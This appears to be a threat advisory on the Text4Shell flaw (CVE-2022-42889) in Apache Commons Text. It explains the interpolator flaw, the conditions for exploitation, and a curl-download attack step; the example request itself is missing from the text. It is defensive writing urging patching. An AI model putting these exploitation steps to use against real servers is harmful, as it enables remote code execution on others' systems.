CVE-2022-42889, dubbed “Text4Shell“, was publicly recognized in early October. Text4Shell is a vulnerability that effects Apache Commons Text, a Java library described by their creators as “focused on algorithms working on strings”. CVE-2022-42889 could result in remote code execution, which would allow for an attacker to execute arbitrary code on victim machines and perform further actions on objectives. The vulnerability is rated a 9.8 on the CVSS Severity scale, and thus deemed to be ‘critical’. The affected versions of Apache Commons Text are 1.5 through 1.9, and the vulnerability has been patched in the latest version, as of this writing, which is 1.10.
While Text4Shell boasts a high CVSS score of 9.8, and carries a similar name to Log4Shell and other impactful vulnerabilities released in recent years, researchers claim that the similarities between the vulnerabilities are not as striking as initially thought. According to Rapid7, the nature of Text4Shell means that unlike Log4Shell, it will be rare that an application will use the vulnerable component of Apache Commons Text to process untrusted, potentially malicious input (Rapid7, 2022). This does not mean that this vulnerability is not serious however, but rather that it is not on the same level as Log4Shell (CVE-2021-44228), which was a remote code execution vulnerability identified in Apache Log4j2 framework and garnered a CVSS severity rating of 10.
That being said, it does not appear that Text4Shell poses a significant impact over similarly named “*4Shell” vulnerabilities that preceded it, such as Log4Shell or Spring4Shell. It is nonetheless recommended to update vulnerable Apache Commons Text versions
Threat Synopsis – Text4Shell Ransomware
The identification of Text4Shell or CVE-2022-42889 in October 2022 almost immediately piqued the interest of security professionals and created a stir throughout the community, as organizations and researchers alike rushed to determine if this new “4Shell” vulnerability was as widespread and damaging as its predecessors. The Text4Shell vulnerability enables attackers to perform remote code execution via string substitutions carried out during script, dns, or url string lookups, a method similar to that of the dangerous Log4Shell (CVE-2021-44228) vulnerability, which was a remote code execution vulnerability identified in Apache Log4j2 framework in late 2021.
The vulnerability specifically resides within the StringSubstitutor interpolator object of Apache Commons Text. This interpolator is created by the StringSubstitutor.createInterpolator() method, and and contains a logic flaw that allows for the “script”, “dns”, or “url” string lookups to be interpolated by default which could lead to arbitrary code execution. Successful exploitation of this vulnerability can allow actors to perform a myriad of actions on objectives, an example of which could be to open a reverse shell with the vulnerable application via a specially crafted payload – providing attackers a foothold from which to launch future attacks.
In order for an attacker to successfully exploit this vulnerability, they must first ensure that the targeted server is running a version of Apache Commons Text from versions 1.5 to version 1.9, and use the StringSubstitutor interpolator. If these conditions are met, an attacker can send crafted HTTP requests to the vulnerable server which contain a URL encoded payload. An example of an exploitation attempt URL could be:
This request would execute curl on the vulnerable server to download a file, then the attacker could send an additional command to execute the downloaded file.
While the newly discovered vulnerability shares a similar name and functionality to that of the infamous Log4Shell vulnerability, there are major differences in its implementation and impact. Given the widespread usage of the Apache Log4j2 framework, even the most fundamental use-cases are vulnerable to Log4Shell, whereas the Text4Shell vulnerability requires that Apache Commons Text be used and configured in a certain way which exposes the attack surface and leaves the vulnerability exploitable. According to Apache’s security team “…This issue is different from Log4Shell (CVE-2021-44228) because in Log4Shell, string interpolation was possible from the log message body, which commonly contains untrusted input. In the Apache Common Text issue, the relevant method is explicitly intended and clearly documented to perform string interpolation, so it is much less likely that applications would inadvertently pass in untrusted input without proper validation.”
While exploitation attempts in the wild have been observed, it is expected to be limited in scope. It is the recommended to ensure Apache Commons Text is patched to the latest available release (which is 1.10 at the time of this writing) which resolves the associated vulnerability.